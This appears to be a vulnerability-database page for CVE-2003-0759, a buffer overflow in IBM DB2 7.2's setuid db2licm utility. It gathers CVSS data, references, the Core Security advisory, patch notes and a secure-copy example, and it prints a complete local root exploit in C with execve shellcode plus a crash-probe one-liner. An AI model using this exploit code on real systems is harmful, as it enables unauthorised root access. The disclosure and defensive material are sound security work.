CVE-2003-0759
CVSS 7.2
Published: 2003-10-06 00:00:00
Revised: 2016-10-17 22:37:11

[Original] Buffer overflow in db2licm in IBM DB2 Universal Data Base 7.2 before Fixpak 10a allows local users to gain root privileges via a long command line argument.


[CNNVD] IBM DB2 db2licm Utility Local Buffer Overflow Vulnerability (CNNVD-200310-012)

        
        IBM DB2 is a large commercial relational database system aimed at e-business, business intelligence, content management and customer relationship management applications; it runs on AIX, HP-UX, Linux, Solaris and Windows.
        IBM DB2 ships with a utility named db2licm. Its implementation contains a buffer overflow that a local attacker may exploit to obtain root privileges on the host.
        db2licm is installed setuid root with group db2asgrp, and db2inst1 is the only member of db2asgrp, so an attacker with local access as db2inst1 can exploit the overflow to gain root. The vulnerability has been confirmed in IBM DB2 v7.2 for Linux x86/s390; installations on other operating systems may also be affected.
        

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be fully compromised]
Availability impact: COMPLETE [may result in total shutdown of the system]
Access complexity: LOW [no special access conditions required]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0759
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0759
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-012
(official data source) CNNVD

- Other links and resources

ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2aixv7/FP10a_U495172/FixpakReadme.txt
(UNKNOWN)  CONFIRM  ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2aixv7/FP10a_U495172/FixpakReadme.txt
http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0114.html
(UNKNOWN)  VULNWATCH  20030918 CORE-2003-0531: Multiple IBM DB2 Stack Overflow Vulnerabilities
http://marc.info/?l=bugtraq&m=106389919618721&w=2
(UNKNOWN)  BUGTRAQ  20030918 CORE-2003-0531: Multiple IBM DB2 Stack Overflow Vulnerabilities
http://www-3.ibm.com/cgi-bin/db2www/data/db2/udb/winos2unix/support/aparlib.d2w/display_apar_details?aparno=IY47653
(UNKNOWN)  AIXAPAR  IY47653
http://www.ciac.org/ciac/bulletins/n-154.shtml
(UNKNOWN)  CIAC  N-154
http://www.coresecurity.com/common/showdoc.php?idx=366&idxseccion=10
(UNKNOWN)  MISC  http://www.coresecurity.com/common/showdoc.php?idx=366&idxseccion=10
http://www.securityfocus.com/bid/8553
(VENDOR_ADVISORY)  BID  8553

- Vulnerability information

IBM DB2 db2licm Utility Local Buffer Overflow Vulnerability
Severity: High    Class: Boundary condition error
Published: 2003-10-06 00:00:00    Updated: 2005-10-20 00:00:00
Attack vector: Local
(Description as given under the CNNVD entry above.)

- Advisories and patches

        Vendor patch:
        IBM
        ---
        The vendor has released an update (Fixpak 10a for DB2 v7.2, per the references above) that corrects this issue; download it from the vendor's site:
        
        http://www-4.ibm.com/software/data/db2/linux/

- Exploit (EDB-ID 106)

IBM DB2 Universal Database 7.2 (db2licm) Local Exploit (EDBID:106)
Platform: linux    Type: local
Published: 2003-09-27    Verified
Author: Juan Escriba
/*
        Local Exploit for db2licm
        IBM db2 v 7.1 Linux/x86

        vulnerability researched by
        Juan Manuel Pascual Escriba
        pask at uninet.edu

        Target assumptions: a 32-bit Linux/x86 process (build with -m32), a fixed
        stack top of 0xC0000000 and no stack randomisation, as on 2003-era kernels.
        The shellcode is delivered in an environment variable and the overflowing
        argument is filled with the shellcode's predicted address.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char sc[]=
"\x31\xc0"      /* begin setuid (0): xor eax,eax; xor ebx,ebx; mov al,23; int 0x80 */
"\x31\xdb"
"\xb0\x17"
"\xcd\x80"

"\xeb\x1f"      /* execve("/bin/sh", ["/bin/sh", NULL], NULL): jmp/call trick to find the string */
"\x5e"
"\x89\x76\x08"
"\x31\xc0"
"\x88\x46\x07"
"\x89\x46\x0c"
"\xb0\x0b"
"\x89\xf3"
"\x8d\x4e\x08"
"\x8d\x56\x0c"
"\xcd\x80"
"\x31\xdb"      /* exit(0) in case execve fails */
"\x89\xd8"
"\x40"
"\xcd\x80"
"\xe8\xdc\xff\xff\xff"
"/bin/sh";


#define STACK_TOP_X86 0xC0000000        /* top of the user stack on 32-bit Linux without ASLR */
#define ALG_MASK 0xfffffff4
#define ADDR 1000                       /* copies of the return address written into the overflow */
#define DB2LICM "/home/db2inst1/sqllib/adm/db2licm"

#define DFL_ALG 4

int main(void){
        char *argv[4];                  /* path, "-a", overflow, terminating NULL (original declared 3 slots: off by one) */
        char *envp[2];
        unsigned long sc_address, ba=0;
        unsigned char alg = DFL_ALG;
        unsigned long *p;
        unsigned char *q;
        unsigned int i;

        /* execve() lays out a 4-byte null word, then the program path string, then
           the environment strings directly below the stack top, so the address of
           the shellcode inside envp[0] ("pete=" + sc) is predictable. */
        sc_address = STACK_TOP_X86 - 4 - strlen(DB2LICM) - sizeof(sc) - 1;
        printf("shellcode address = 0x%lX\n",sc_address);

        /* pad the end of the environment string so the shellcode starts on the mask boundary */
        if( (sc_address & ALG_MASK) != sc_address ) {
                ba = sc_address - (sc_address & ALG_MASK);
                printf("adding %lu trailing bytes to backward align shellcode to 0x%lX\n", ba,
                        sc_address & ALG_MASK);
                sc_address = STACK_TOP_X86 - 4 - strlen(DB2LICM) - sizeof(sc) - ba - 1;
                printf("new shellcode address = 0x%lX\n",sc_address);
        }

        /* envp[0] = "pete=" + shellcode + ba bytes of 'A' padding + NUL */
        envp[0] = (char*)malloc(sizeof(sc)+strlen("pete=")+1+ba);
        q = (unsigned char*)envp[0];
        strcpy((char*)q,"pete=");
        q += strlen("pete=");
        memcpy(q,sc,sizeof(sc));
        q += sizeof(sc)-1;              /* overwrite sc's NUL so the padding stays in the same string */
        memset(q,'A',ba);
        q += ba;
        *q = 0;
        envp[1] = 0;

        /* build overflowing argv[2]: 'alg' filler bytes, then ADDR copies of the shellcode
           address, so whichever 4-byte slot holds the saved return address gets overwritten */

        printf("using alignment = %d in overflow buffer\n",alg);

        argv[0] = DB2LICM;
        argv[1] = "-a";
        /* room for the filler, ADDR addresses and a full-width terminating zero word */
        argv[2] = (char*)malloc(ADDR*sizeof(unsigned long)+alg+sizeof(unsigned long));
        memset(argv[2],'A',alg);
        p=(unsigned long*)(argv[2]+alg);
        for(i=0;i<ADDR;i++) {
                *p = sc_address;
                p++;
        }
        *p = 0;
        argv[3] = 0;

        printf("executing %s ...\n\n",argv[0]);
        execve(argv[0],argv,envp);
        perror("execve");               /* only reached if the target could not be started */
        return 1;
}

// milw0rm.com [2003-09-27]
		

- Vulnerability information (PacketStorm F31725)

IBM-DB2-db2licm.c (PacketStormID:F31725)
2003-09-26 00:00:00
Juan Manuel Pascual Escriba  concepcion.upv.es
exploit,local,root
linux
CVE-2003-0758,CVE-2003-0759

Local root exploit for IBM DB2 Universal Database version 7.2 for Linux/s390 which makes use of the db2licm binary that is setuid by default.

- Vulnerability information (PacketStorm F31666)

core.db2.txt (PacketStormID:F31666)
2003-09-18 00:00:00
Juan Pablo Martinez Kuhn  coresecurity.com
advisory,overflow,local,root
linux
CVE-2003-0758,CVE-2003-0759

Core Security Technologies Advisory ID: CORE-2003-0531 - IBM DB2 Universal Data Base v7.2 for Linux/s390 has two binaries in a default install which are setuid to root and have owner and group execute capabilities. These binaries are vulnerable to buffer overflow attacks from a local user that is in the same group.

Core Security Technologies Advisory
                            http://www.coresecurity.com

                  Multiple IBM DB2 Stack Overflow Vulnerabilities



Date Published: 2003-09-18

Last Update: 2003-09-18

Advisory ID: CORE-2003-0531

Bugtraq ID: 8552, 8553

CVE Name: CAN-2003-0758, CAN-2003-0759

Title: Multiple IBM DB2 Stack Overflow Vulnerabilities

Class: Boundary Error Condition (Buffer Overflow)

Remotely Exploitable: No

Locally Exploitable: Yes

Advisory URL: 
 http://www.coresecurity.com/common/showdoc.php?idx=366&idxseccion=10

Vendors contacted: 
- IBM:
  . Core Notification: 2003-08-15
  . Notification acknowledged by IBM: 2003-08-18
  . Fixes available for [CAN-2003-0758]: 2003-08-31
  . Fixes available for [CAN-2003-0759]: 2003-09-17

Release Mode: COORDINATED RELEASE


*Vulnerability Description:*

 DB2 is IBM's relational database software, oriented toward the 
 deployment and development of e-business, business intelligence, 
 content management, enterprise resource planning and customer 
 relationship management solutions. DB2 can be deployed in
 AIX, HP-UX, Linux, Solaris and Windows environments.

 IBM's DB2 database ships with two vulnerable setuid binaries, namely
 db2licm and db2dart. Both binaries are vulnerable to a buffer overflow
 that allows a local attacker to execute arbitrary code on the
 vulnerable machine with privileges of the root user. The vulnerability
 is triggered providing a long command line argument to the binaries.

 By default (in the environment available during research), the
 vulnerable binaries have the following privileges (for example in the
 case of db2licm):
 
 -r-sr-x---    1 root     db2iadm1    31926 Jun 21  2002 /home/db2inst1/sqllib/adm/db2licm
 -r-sr-x---    1 root     db2asgrp    31926 Jun 21  2002 /home/db2as/sqllib/adm/db2licm

 db2as is the only user in the db2iadm1 group, and db2inst1 is the
 only user in the db2asgrp group. So, in a default install, an attacker
 with access to the system through either of those accounts will be able
 to escalate privileges to the root account.
 

*Vulnerable Packages:*

 IBM DB2 Universal Data Base v7.2 for Linux/x86 is vulnerable.
 IBM DB2 Universal Data Base v7.2 for Linux/s390 is vulnerable.

 Other IBM DB2 versions and target platforms were not available for
 testing, but may be vulnerable as well.


*Solution/Vendor Information/Workaround:*

 [BID 8552, CAN-2003-0758]
 The db2dart issue is fixed in Fixpak 10 for DB2 v7.2.

 Fixpak 10 is available at:
 http://www-3.ibm.com/cgi-bin/db2www/data/db2/udb/winos2unix/support/download.d2w/report


 [BID 8553, CAN-2003-0759]
 The db2licm issue is fixed in Fixpak 10a for DB2 v7.2.

 Fixpak 10a will soon be available at:
 http://www-3.ibm.com/cgi-bin/db2www/data/db2/udb/winos2unix/support/v7fphist.d2w/report

 If Fixpak 10a is not already available in this webpage, you
 can download it from IBM's FTP site. For example the 32-bit Intel
 Linux version of fixpack 10a is located at:
 ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2linuxv7/FP10a_U495179

 

*Credits:*

 This vulnerability was found by Juan Pablo Martinez Kuhn from 
 Core Security Technologies. 
 We wish to thank Juan Manuel Pascual Escriba for his cooperation 
 testing and confirming the vulnerabilities. We also wish to thank
 Scott Logan from IBM for his quick response to this issue.


*Technical Description - Exploit/Concept Code:*

 The following tests are enough to confirm a binary is vulnerable.
 Executing these perl scripts should produce a segmentation fault
 in vulnerable binaries:

 [BID 8552, CAN-2003-0758]

 /home/db2as/sqllib/adm/db2dart `perl -e 'print "A"x1287'`

 Segmentation fault


 [BID 8553, CAN-2003-0759]

 /home/db2as/sqllib/adm/db2licm `perl -e 'print "A"x999'`
 ...
 User Response:  Enter the name of a file that exists and can be
 opened and try the command again.

 Segmentation fault
 ...

 Both binaries suffer from a simple stack based buffer overflow.
 Exploitation of the vulnerabilities is trivial. To confirm the
 exploitability, sample exploit code was developed for DB2 7.1 binaries
 for the Linux operating system running on x86 and s390 systems.
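 The bug class the advisory names, shown as an added example rather than as
 code from the advisory or from IBM: a fixed-size stack buffer filled from a
 command-line argument with no length check, beside a bounded replacement,
 driven with the same 999-byte "A" probe. The 256-byte buffer, the file-name
 role of the argument and every function name here are assumptions for
 illustration; the real db2licm frame layout is not given on this page.

```c
/* Added example, not from the Core advisory or from IBM: the unbounded copy
 * pattern behind a "long command line argument" overflow, next to a bounded
 * version, exercised with the advisory's 999-byte probe. Buffer size and
 * function names are assumptions for illustration. */
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define ARG_BUF 256   /* assumed size of the on-stack argument buffer */

/* Vulnerable pattern: strcpy() writes strlen(arg)+1 bytes into a 256-byte
 * frame buffer. A 999-byte argument runs past it into the saved frame pointer
 * and return address; in a setuid-root binary that is the whole escalation.
 * Kept for contrast and only ever called on short input here. */
int copy_arg_unsafe(const char *arg)
{
    char buf[ARG_BUF];
    strcpy(buf, arg);
    return (int)strlen(buf);
}

/* Bounded replacement: measure against the destination size first (without
 * reading past it), fail closed with ENAMETOOLONG, then copy exactly the
 * bytes that were checked. Returns the length copied, or -1. */
int copy_arg_safe(const char *arg, char *dst, size_t dstsz)
{
    size_t n = 0;
    while (n < dstsz && arg[n] != '\0')   /* bounded scan, same effect as strnlen() */
        n++;
    if (n >= dstsz) {
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(dst, arg, n + 1);               /* includes the terminating NUL */
    return (int)n;
}

/* Build the advisory's probe (perl -e 'print "A"x999') in memory and feed it
 * to the bounded copy. 1 = rejected, 0 = accepted, -1 = probe too large to build. */
int probe_rejected(size_t probe_len)
{
    char probe[1024];
    char buf[ARG_BUF];
    if (probe_len >= sizeof probe) return -1;
    memset(probe, 'A', probe_len);
    probe[probe_len] = '\0';
    return copy_arg_safe(probe, buf, sizeof buf) < 0 ? 1 : 0;
}

int main(void)
{
    char buf[ARG_BUF];
    int n = copy_arg_safe("db2licm.lic", buf, sizeof buf);
    printf("short argument: copied %d bytes -> \"%s\"\n", n, buf);
    printf("999-byte probe: %s\n",
           probe_rejected(999) ? "rejected (ENAMETOOLONG)"
                               : "ACCEPTED - buffer still overflowable");
    return 0;
}
```

 The point of the bounded scan is that the length check and the copy use the
 same limit: checking with strlen() and then copying would still read an
 unterminated argument past its end, and checking against a different
 constant than the buffer size is how off-by-one fixes fail.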


*About Core Security Technologies*

 Core Security Technologies develops strategic security solutions for
 Fortune 1000 corporations, government agencies and military
 organizations. The company offers information security software and
 services designed to assess risk and protect and manage information
 assets.
 Headquartered in Boston, MA, Core Security Technologies can be reached
 at 617-399-6980 or on the Web at http://www.coresecurity.com.

 To learn more about CORE IMPACT, the first comprehensive penetration
 testing framework, visit:
 http://www.coresecurity.com/products/coreimpact


*DISCLAIMER:*

 The contents of this advisory are copyright (c) 2003 CORE Security
 Technologies and may be distributed freely provided that no fee is
 charged for this distribution and proper credit is given.

$Id: db2-advisory.txt,v 1.4 2003/09/18 11:05:35 carlos Exp $


    

- Vulnerability information

ID: 2171
IBM DB2 db2licm Command Line Local Overflow
Location: Local Access Required    Attack type: Input Manipulation
Impact: Loss of Integrity
Exploit: Public    Vendor Verified

- Description

A local overflow exists in IBM DB2. The 'db2licm' binary fails to perform proper bounds checking resulting in a buffer overflow. By passing an overly long command line argument to the binary, a malicious user can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

Disclosed: 2003-09-18    Vendor notified: 2003-08-15
Exploit published: 2003-09-18    Vendor fix available: 2003-09-17

- Solution

No workaround is known. IBM has released a patch to address this vulnerability (Fixpak 10a for DB2 v7.2, per the references above).

- Vulnerability information (BID 8553)

IBM DB2 db2licm Buffer Overflow Vulnerability
Class: Boundary Condition Error    Bugtraq ID: 8553
Remote: No    Local: Yes
Published: 2003-09-18 12:00:00    Updated: 2009-07-11 11:56:00
Credit: Discovery of this vulnerability has been credited to Juan Pablo Martinez Kuhn from Core Security Technologies.

- Affected software versions

IBM DB2 Universal Database for Linux 7.2

- Discussion

It has been reported that the IBM DB2 db2licm utility is prone to a locally exploitable buffer overflow vulnerability. A local attacker who can authenticate or otherwise has access as the db2inst1 user may exploit this issue to execute arbitrary instructions with elevated privileges, specifically those of the 'root' user.

This vulnerability has been reported to affect IBM DB2 v7.2 for Linux x86/s390; other IBM DB2 versions and target platforms may also be affected.

- Exploit

The following proof of concept has been supplied:

/home/db2as/sqllib/adm/db2licm `perl -e 'print "A"x999'`

Exploit code has been developed (see the EDB-ID 106 entry above).

- Solution

Fixpak 10a has been released to address this issue.

Fixed in:
IBM DB2 Universal Database for Linux 7.2: Fixpak 10a
